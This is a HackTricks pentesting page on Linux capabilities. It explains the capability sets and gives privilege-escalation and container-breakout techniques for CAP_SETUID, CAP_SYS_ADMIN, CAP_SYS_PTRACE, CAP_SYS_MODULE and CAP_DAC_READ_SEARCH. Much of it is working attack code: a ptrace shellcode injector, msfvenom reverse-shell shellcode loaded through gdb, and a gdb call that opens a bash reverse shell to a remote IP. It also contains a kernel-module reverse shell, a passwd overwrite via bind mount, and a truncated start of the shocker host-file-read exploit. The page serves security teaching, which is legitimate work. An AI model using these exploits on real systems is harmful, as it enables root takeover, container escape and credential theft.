{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
RootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.\
{% embed url="https://www.rootedcon.com/" %}
Linux capabilities divide root privileges into smaller, distinct units, allowing processes to have a subset of privileges. This minimizes the risks by not granting full root privileges unnecessarily.
- Normal users have limited permissions, affecting tasks like opening a network socket which requires root access.
-
Inherited (CapInh):
- Purpose: Determines the capabilities passed down from the parent process.
- Functionality: When a new process is created, it inherits the capabilities from its parent in this set. Useful for maintaining certain privileges across process spawns.
- Restrictions: A process cannot gain capabilities that its parent did not possess.
-
Effective (CapEff):
- Purpose: Represents the actual capabilities a process is utilizing at any moment.
- Functionality: It's the set of capabilities checked by the kernel to grant permission for various operations. For files, this set can be a flag indicating if the file's permitted capabilities are to be considered effective.
- Significance: The effective set is crucial for immediate privilege checks, acting as the active set of capabilities a process can use.
-
Permitted (CapPrm):
- Purpose: Defines the maximum set of capabilities a process can possess.
- Functionality: A process can elevate a capability from the permitted set to its effective set, giving it the ability to use that capability. It can also drop capabilities from its permitted set.
- Boundary: It acts as an upper limit for the capabilities a process can have, ensuring a process doesn't exceed its predefined privilege scope.
-
Bounding (CapBnd):
- Purpose: Puts a ceiling on the capabilities a process can ever acquire during its lifecycle.
- Functionality: Even if a process has a certain capability in its inheritable or permitted set, it cannot acquire that capability unless it's also in the bounding set.
- Use-case: This set is particularly useful for restricting a process's privilege escalation potential, adding an extra layer of security.
-
Ambient (CapAmb):
- Purpose: Allows certain capabilities to be maintained across an
execve
system call, which typically would result in a full reset of the process's capabilities. - Functionality: Ensures that non-SUID programs that don't have associated file capabilities can retain certain privileges.
- Restrictions: Capabilities in this set are subject to the constraints of the inheritable and permitted sets, ensuring they don't exceed the process's allowed privileges.
- Purpose: Allows certain capabilities to be maintained across an
# Code to demonstrate the interaction of different capability sets might look like this:
# Note: This is pseudo-code for illustrative purposes only.
def manage_capabilities(process):
if process.has_capability('cap_setpcap'):
process.add_capability_to_set('CapPrm', 'new_capability')
process.limit_capabilities('CapBnd')
process.preserve_capabilities_across_execve('CapAmb')
For further information check:
- https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work
- https://blog.ploetzli.ch/2014/understanding-linux-capabilities/
To see the capabilities for a particular process, use the status file in the /proc directory. As it provides more details, let’s limit it only to the information related to Linux capabilities.
Note that for all running processes capability information is maintained per thread, for binaries in the file system it’s stored in extended attributes.
You can find the capabilities defined in /usr/include/linux/capability.h
You can find the capabilities of the current process in cat /proc/self/status
or doing capsh --print
and of other users in /proc/<pid>/status
cat /proc/1234/status | grep Cap
cat /proc/$$/status | grep Cap #This will print the capabilities of the current process
This command should return 5 lines on most systems.
- CapInh = Inherited capabilities
- CapPrm = Permitted capabilities
- CapEff = Effective capabilities
- CapBnd = Bounding set
- CapAmb = Ambient capabilities set
#These are the typical capabilities of a root owned process (all)
CapInh: 0000000000000000
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
These hexadecimal numbers don’t make sense. Using the capsh utility we can decode them into the capabilities name.
capsh --decode=0000003fffffffff
0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37
Lets check now the capabilities used by ping
:
cat /proc/9491/status | grep Cap
CapInh: 0000000000000000
CapPrm: 0000000000003000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
capsh --decode=0000000000003000
0x0000000000003000=cap_net_admin,cap_net_raw
Although that works, there is another and easier way. To see the capabilities of a running process, simply use the getpcaps tool followed by its process ID (PID). You can also provide a list of process IDs.
getpcaps 1234
Lets check here the capabilities of tcpdump
after having giving the binary enough capabilities (cap_net_admin
and cap_net_raw
) to sniff the network (tcpdump is running in process 9562):
#The following command give tcpdump the needed capabilities to sniff traffic
$ setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
$ getpcaps 9562
Capabilities for `9562': = cap_net_admin,cap_net_raw+ep
$ cat /proc/9562/status | grep Cap
CapInh: 0000000000000000
CapPrm: 0000000000003000
CapEff: 0000000000003000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
$ capsh --decode=0000000000003000
0x0000000000003000=cap_net_admin,cap_net_raw
As you can see the given capabilities corresponds with the results of the 2 ways of getting the capabilities of a binary.
The getpcaps tool uses the capget() system call to query the available capabilities for a particular thread. This system call only needs to provide the PID to obtain more information.
Binaries can have capabilities that can be used while executing. For example, it's very common to find ping
binary with cap_net_raw
capability:
getcap /usr/bin/ping
/usr/bin/ping = cap_net_raw+ep
You can search binaries with capabilities using:
getcap -r / 2>/dev/null
If we drop the CAP_NET_RAW capabilities for ping, then the ping utility should no longer work.
capsh --drop=cap_net_raw --print -- -c "tcpdump"
Besides the output of capsh itself, the tcpdump command itself should also raise an error.
/bin/bash: /usr/sbin/tcpdump: Operation not permitted
The error clearly shows that the ping command is not allowed to open an ICMP socket. Now we know for sure that this works as expected.
You can remove capabilities of a binary with
setcap -r </path/to/binary>
Apparently it's possible to assign capabilities also to users. This probably means that every process executed by the user will be able to use the users capabilities.
Base on on this, this and this a few files new to be configured to give a user certain capabilities but the one assigning the capabilities to each user will be /etc/security/capability.conf
.
File example:
# Simple
cap_sys_ptrace developer
cap_net_raw user1
# Multiple capablities
cap_net_admin,cap_net_raw jrnetadmin
# Identical, but with numeric values
12,13 jrnetadmin
# Combining names and numerics
cap_sys_admin,22,25 jrsysadmin
Compiling the following program it's possible to spawn a bash shell inside an environment that provides capabilities.
{% code title="ambient.c" %}
/*
* Test program for the ambient capabilities
*
* compile using:
* gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c
* Set effective, inherited and permitted capabilities to the compiled binary
* sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient
*
* To get a shell with additional caps that can be inherited do:
*
* ./ambient /bin/bash
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/prctl.h>
#include <linux/capability.h>
#include <cap-ng.h>
static void set_ambient_cap(int cap) {
int rc;
capng_get_caps_process();
rc = capng_update(CAPNG_ADD, CAPNG_INHERITABLE, cap);
if (rc) {
printf("Cannot add inheritable cap\n");
exit(2);
}
capng_apply(CAPNG_SELECT_CAPS);
/* Note the two 0s at the end. Kernel checks for these */
if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0)) {
perror("Cannot set cap");
exit(1);
}
}
void usage(const char * me) {
printf("Usage: %s [-c caps] new-program new-args\n", me);
exit(1);
}
int default_caplist[] = {
CAP_NET_RAW,
CAP_NET_ADMIN,
CAP_SYS_NICE,
-1
};
int * get_caplist(const char * arg) {
int i = 1;
int * list = NULL;
char * dup = strdup(arg), * tok;
for (tok = strtok(dup, ","); tok; tok = strtok(NULL, ",")) {
list = realloc(list, (i + 1) * sizeof(int));
if (!list) {
perror("out of memory");
exit(1);
}
list[i - 1] = atoi(tok);
list[i] = -1;
i++;
}
return list;
}
int main(int argc, char ** argv) {
int rc, i, gotcaps = 0;
int * caplist = NULL;
int index = 1; // argv index for cmd to start
if (argc < 2)
usage(argv[0]);
if (strcmp(argv[1], "-c") == 0) {
if (argc <= 3) {
usage(argv[0]);
}
caplist = get_caplist(argv[2]);
index = 3;
}
if (!caplist) {
caplist = (int * ) default_caplist;
}
for (i = 0; caplist[i] != -1; i++) {
printf("adding %d to ambient list\n", caplist[i]);
set_ambient_cap(caplist[i]);
}
printf("Ambient forking shell\n");
if (execv(argv[index], argv + index))
perror("Cannot exec");
return 0;
}
{% endcode %}
gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c
sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient
./ambient /bin/bash
Inside the bash executed by the compiled ambient binary it's possible to observe the new capabilities (a regular user won't have any capability in the "current" section).
capsh --print
Current: = cap_net_admin,cap_net_raw,cap_sys_nice+eip
{% hint style="danger" %} You can only add capabilities that are present in both the permitted and the inheritable sets. {% endhint %}
The capability-aware binaries won't use the new capabilities given by the environment, however the capability dumb binaries will use them as they won't reject them. This makes capability-dumb binaries vulnerable inside a special environment that grant capabilities to binaries.
By default a service running as root will have assigned all the capabilities, and in some occasions this may be dangerous.
Therefore, a service configuration file allows to specify the capabilities you want it to have, and the user that should execute the service to avoid running a service with unnecessary privileges:
[Service]
User=bob
AmbientCapabilities=CAP_NET_BIND_SERVICE
By default Docker assigns a few capabilities to the containers. It's very easy to check which capabilities are these by running:
docker run --rm -it r.j3ss.co/amicontained bash
Capabilities:
BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap
# Add a capabilities
docker run --rm -it --cap-add=SYS_ADMIN r.j3ss.co/amicontained bash
# Add all capabilities
docker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash
# Remove all and add only one
docker run --rm -it --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash
RootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
{% embed url="https://www.rootedcon.com/" %}
Capabilities are useful when you want to restrict your own processes after performing privileged operations (e.g. after setting up chroot and binding to a socket). However, they can be exploited by passing them malicious commands or arguments which are then run as root.
You can force capabilities upon programs using setcap
, and query these using getcap
:
#Set Capability
setcap cap_net_raw+ep /sbin/ping
#Get Capability
getcap /sbin/ping
/sbin/ping = cap_net_raw+ep
The +ep
means you’re adding the capability (“-” would remove it) as Effective and Permitted.
To identify programs in a system or folder with capabilities:
getcap -r / 2>/dev/null
In the following example the binary /usr/bin/python2.6
is found vulnerable to privesc:
setcap cap_setuid+ep /usr/bin/python2.7
/usr/bin/python2.7 = cap_setuid+ep
#Exploit
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");'
Capabilities needed by tcpdump
to allow any user to sniff packets:
setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
getcap /usr/sbin/tcpdump
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
From the docs: Note that one can assign empty capability sets to a program file, and thus it is possible to create a set-user-ID-root program that changes the effective and saved set-user-ID of the process that executes the program to 0, but confers no capabilities to that process. Or, simply put, if you have a binary that:
- is not owned by root
- has no
SUID
/SGID
bits set - has empty capabilities set (e.g.:
getcap myelf
returnsmyelf =ep
)
then that binary will run as root.
CAP_SYS_ADMIN
is a highly potent Linux capability, often equated to a near-root level due to its extensive administrative privileges, such as mounting devices or manipulating kernel features. While indispensable for containers simulating entire systems, CAP_SYS_ADMIN
poses significant security challenges, especially in containerized environments, due to its potential for privilege escalation and system compromise. Therefore, its usage warrants stringent security assessments and cautious management, with a strong preference for dropping this capability in application-specific containers to adhere to the principle of least privilege and minimize the attack surface.
Example with binary
getcap -r / 2>/dev/null
/usr/bin/python2.7 = cap_sys_admin+ep
Using python you can mount a modified passwd file on top of the real passwd file:
cp /etc/passwd ./ #Create a copy of the passwd file
openssl passwd -1 -salt abc password #Get hash of "password"
vim ./passwd #Change roots passwords of the fake passwd file
And finally mount the modified passwd
file on /etc/passwd
:
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/path/to/fake/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)
And you will be able to su
as root using password "password".
Example with environment (Docker breakout)
You can check the enabled capabilities inside the docker container using:
capsh --print
Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+ep
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=0(root)
Inside the previous output you can see that the SYS_ADMIN capability is enabled.
- Mount
This allows the docker container to mount the host disk and access it freely:
fdisk -l #Get disk name
Disk /dev/sda: 4 GiB, 4294967296 bytes, 8388608 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
mount /dev/sda /mnt/ #Mount it
cd /mnt
chroot ./ bash #You have a shell inside the docker hosts disk
- Full access
In the previous method we managed to access the docker host disk.
In case you find that the host is running an ssh server, you could create a user inside the docker host disk and access it via SSH:
#Like in the example before, the first step is to mount the docker host disk
fdisk -l
mount /dev/sda /mnt/
#Then, search for open ports inside the docker host
nc -v -n -w2 -z 172.17.0.1 1-65535
(UNKNOWN) [172.17.0.1] 2222 (?) open
#Finally, create a new user inside the docker host and use it to access via SSH
chroot /mnt/ adduser john
ssh [email protected] -p 2222
This means that you can escape the container by injecting a shellcode inside some process running inside the host. To access processes running inside the host the container needs to be run at least with --pid=host
.
CAP_SYS_PTRACE
grants the ability to use debugging and system call tracing functionalities provided by ptrace(2)
and cross-memory attach calls like process_vm_readv(2)
and process_vm_writev(2)
. Although powerful for diagnostic and monitoring purposes, if CAP_SYS_PTRACE
is enabled without restrictive measures like a seccomp filter on ptrace(2)
, it can significantly undermine system security. Specifically, it can be exploited to circumvent other security restrictions, notably those imposed by seccomp, as demonstrated by proofs of concept (PoC) like this one.
Example with binary (python)
getcap -r / 2>/dev/null
/usr/bin/python2.7 = cap_sys_ptrace+ep
import ctypes
import sys
import struct
# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.html
PTRACE_POKETEXT = 4
PTRACE_GETREGS = 12
PTRACE_SETREGS = 13
PTRACE_ATTACH = 16
PTRACE_DETACH = 17
# Structure defined in <sys/user.h>
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct
class user_regs_struct(ctypes.Structure):
_fields_ = [
("r15", ctypes.c_ulonglong),
("r14", ctypes.c_ulonglong),
("r13", ctypes.c_ulonglong),
("r12", ctypes.c_ulonglong),
("rbp", ctypes.c_ulonglong),
("rbx", ctypes.c_ulonglong),
("r11", ctypes.c_ulonglong),
("r10", ctypes.c_ulonglong),
("r9", ctypes.c_ulonglong),
("r8", ctypes.c_ulonglong),
("rax", ctypes.c_ulonglong),
("rcx", ctypes.c_ulonglong),
("rdx", ctypes.c_ulonglong),
("rsi", ctypes.c_ulonglong),
("rdi", ctypes.c_ulonglong),
("orig_rax", ctypes.c_ulonglong),
("rip", ctypes.c_ulonglong),
("cs", ctypes.c_ulonglong),
("eflags", ctypes.c_ulonglong),
("rsp", ctypes.c_ulonglong),
("ss", ctypes.c_ulonglong),
("fs_base", ctypes.c_ulonglong),
("gs_base", ctypes.c_ulonglong),
("ds", ctypes.c_ulonglong),
("es", ctypes.c_ulonglong),
("fs", ctypes.c_ulonglong),
("gs", ctypes.c_ulonglong),
]
libc = ctypes.CDLL("libc.so.6")
pid=int(sys.argv[1])
# Define argument type and respone type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64
# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers=user_regs_struct()
# Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))
print("Instruction Pointer: " + hex(registers.rip))
print("Injecting Shellcode at: " + hex(registers.rip))
# Shell code copied from exploit db. https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c
shellcode = "\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
# Inject the shellcode into the running process byte by byte.
for i in xrange(0,len(shellcode),4):
# Convert the byte to little endian.
shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)
shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
shellcode_byte=int(shellcode_byte_little_endian,16)
# Inject the byte.
libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)
print("Shellcode Injected!!")
# Modify the instuction pointer
registers.rip=registers.rip+2
# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))
print("Final Instruction Pointer: " + hex(registers.rip))
# Detach from the process.
libc.ptrace(PTRACE_DETACH, pid, None, None)
Example with binary (gdb)
gdb
with ptrace
capability:
/usr/bin/gdb = cap_sys_ptrace+ep
Create a shellcode with msfvenom to inject in memory via gdb
# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=9001 -f py -o revshell.py
buf = b""
buf += b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
buf += b"\x48\x97\x48\xb9\x02\x00\x23\x29\x0a\x0a\x0e\x0b"
buf += b"\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05"
buf += b"\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
buf += b"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
buf += b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6"
buf += b"\x0f\x05"
# Divisible by 8
payload = b"\x90" * (-len(buf) % 8) + buf
# Change endianess and print gdb lines to load the shellcode in RIP directly
for i in range(0, len(buf), 8):
chunk = payload[i:i+8][::-1]
chunks = "0x"
for byte in chunk:
chunks += f"{byte:02x}"
print(f"set {{long}}($rip+{i}) = {chunks}")
Debug a root process with gdb ad copy-paste the previously generated gdb lines:
# Let's write the commands to a file
echo 'set {long}($rip+0) = 0x296a909090909090
set {long}($rip+8) = 0x5e016a5f026a9958
set {long}($rip+16) = 0x0002b9489748050f
set {long}($rip+24) = 0x48510b0e0a0a2923
set {long}($rip+32) = 0x582a6a5a106ae689
set {long}($rip+40) = 0xceff485e036a050f
set {long}($rip+48) = 0x6af675050f58216a
set {long}($rip+56) = 0x69622fbb4899583b
set {long}($rip+64) = 0x8948530068732f6e
set {long}($rip+72) = 0x050fe689485752e7
c' > commands.gdb
# In this case there was a sleep run by root
## NOTE that the process you abuse will die after the shellcode
/usr/bin/gdb -p $(pgrep sleep)
[...]
(gdb) source commands.gdb
Continuing.
process 207009 is executing new program: /usr/bin/dash
[...]
Example with environment (Docker breakout) - Another gdb Abuse
If GDB is installed (or you can install it with apk add gdb
or apt install gdb
for example) you can debug a process from the host and make it call the system
function. (This technique also requires the capability SYS_ADMIN
).
gdb -p 1234
(gdb) call (void)system("ls")
(gdb) call (void)system("sleep 5")
(gdb) call (void)system("bash -c 'bash -i >& /dev/tcp/192.168.115.135/5656 0>&1'")
You won’t be able to see the output of the command executed but it will be executed by that process (so get a rev shell).
{% hint style="warning" %} If you get the error "No symbol "system" in current context." check the previous example loading a shellcode in a program via gdb. {% endhint %}
Example with environment (Docker breakout) - Shellcode Injection
You can check the enabled capabilities inside the docker container using:
capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap+ep
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=0(root
List processes running in the host ps -eaf
- Get the architecture
uname -m
- Find a shellcode for the architecture (https://www.exploit-db.com/exploits/41128)
- Find a program to inject the shellcode into a process memory (https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c)
- Modify the shellcode inside the program and compile it
gcc inject.c -o inject
- Inject it and grab your shell:
./inject 299; nc 172.17.0.1 5600
CAP_SYS_MODULE
empowers a process to load and unload kernel modules (init_module(2)
, finit_module(2)
and delete_module(2)
system calls), offering direct access to the kernel's core operations. This capability presents critical security risks, as it enables privilege escalation and total system compromise by allowing modifications to the kernel, thereby bypassing all Linux security mechanisms, including Linux Security Modules and container isolation.
This means that you can insert/remove kernel modules in/from the kernel of the host machine.
Example with binary
In the following example the binary python
has this capability.
getcap -r / 2>/dev/null
/usr/bin/python2.7 = cap_sys_module+ep
By default, modprobe
command checks for dependency list and map files in the directory /lib/modules/$(uname -r)
.
In order to abuse this, lets create a fake lib/modules folder:
mkdir lib/modules -p
cp -a /lib/modules/5.0.0-20-generic/ lib/modules/$(uname -r)
Then compile the kernel module you can find 2 examples below and copy it to this folder:
cp reverse-shell.ko lib/modules/$(uname -r)/
Finally, execute the needed python code to load this kernel module:
import kmod
km = kmod.Kmod()
km.set_mod_dir("/path/to/fake/lib/modules/5.0.0-20-generic/")
km.modprobe("reverse-shell")
Example 2 with binary
In the following example the binary kmod
has this capability.
getcap -r / 2>/dev/null
/bin/kmod = cap_sys_module+ep
Which means that it's possible to use the command insmod
to insert a kernel module. Follow the example below to get a reverse shell abusing this privilege.
Example with environment (Docker breakout)
You can check the enabled capabilities inside the docker container using:
capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=0(root)
Inside the previous output you can see that the SYS_MODULE capability is enabled.
Create the kernel module that is going to execute a reverse shell and the Makefile to compile it:
{% code title="reverse-shell.c" %}
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.8/4444 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
{% endcode %}
{% code title="Makefile" %}
obj-m +=reverse-shell.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
{% endcode %}
{% hint style="warning" %} The blank char before each make word in the Makefile must be a tab, not spaces! {% endhint %}
Execute make
to compile it.
ake[1]: *** /lib/modules/5.10.0-kali7-amd64/build: No such file or directory. Stop.
sudo apt update
sudo apt full-upgrade
Finally, start nc
inside a shell and load the module from another one and you will capture the shell in the nc process:
#Shell 1
nc -lvnp 4444
#Shell 2
insmod reverse-shell.ko #Launch the reverse shell
The code of this technique was copied from the laboratory of "Abusing SYS_MODULE Capability" from https://www.pentesteracademy.com/
Another example of this technique can be found in https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host
CAP_DAC_READ_SEARCH enables a process to bypass permissions for reading files and for reading and executing directories. Its primary use is for file searching or reading purposes. However, it also allows a process to use the open_by_handle_at(2)
function, which can access any file, including those outside the process's mount namespace. The handle used in open_by_handle_at(2)
is supposed to be a non-transparent identifier obtained through name_to_handle_at(2)
, but it can include sensitive information like inode numbers that are vulnerable to tampering. The potential for exploitation of this capability, particularly in the context of Docker containers, was demonstrated by Sebastian Krahmer with the shocker exploit, as analyzed here.
This means that you can bypass can bypass file read permission checks and directory read/execute permission checks.
Example with binary
The binary will be able to read any file. So, if a file like tar has this capability it will be able to read the shadow file:
cd /etc
tar -czf /tmp/shadow.tar.gz shadow #Compress show file in /tmp
cd /tmp
tar -cxf shadow.tar.gz
Example with binary2
In this case lets suppose that python
binary has this capability. In order to list root files you could do:
import os
for r, d, f in os.walk('/root'):
for filename in f:
print(filename)
And in order to read a file you could do:
print(open("/etc/shadow", "r").read())
Example in Environment (Docker breakout)
You can check the enabled capabilities inside the docker container using:
capsh --print
Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=0(root)
Inside the previous output you can see that the DAC_READ_SEARCH capability is enabled. As a result, the container can debug processes.
You can learn how the following exploiting works in https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3 but in resume CAP_DAC_READ_SEARCH not only allows us to traverse the file system without permission checks, but also explicitly removes any checks to open_by_handle_at(2) and could allow our process to sensitive files opened by other processes.
The original exploit that abuse this permissions to read files from the host can be found here: http://stealth.openwall.net/xSports/shocker.c, the following is a modified version that allows you to indicate the file you want to read as first argument and dump it in a file.
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <dirent.h>
#include <stdint.h>
// gcc shocker.c -o shocker
// ./socker /etc/shadow shadow #Read /etc/shadow from host and save result in shadow file in current dir
struct my_file_handle {
unsigned int handle_bytes;
int handle_type;
unsigned char f_handle[8];
};
void die(const char *msg)
{
perror(msg);
exit(errno);
}
void dump_handle(const struct my_file_handle *h)
{
fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes,
h->handle_type);
for (int i = 0; i < h->handle_bytes; ++i) {
fprintf(stderr,"0x%02x", h->f_handle[i]);
if ((i + 1) % 20 == 0)
fprintf(stderr,"\n");
if (i < h->handle_bytes - 1)
fprintf(stderr,", ");
}
fprintf(stderr,"};\n");
}
int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle
*oh)
{
int fd;
uint32_t ino = 0;
struct my_file_handle outh = {
.handle_bytes = 8,
.handle_type = 1
};
DIR *dir = NULL;
struct dirent *de = NULL;
path = strchr(path, '/');
// recursion stops if path has been resolved
if (!path) {
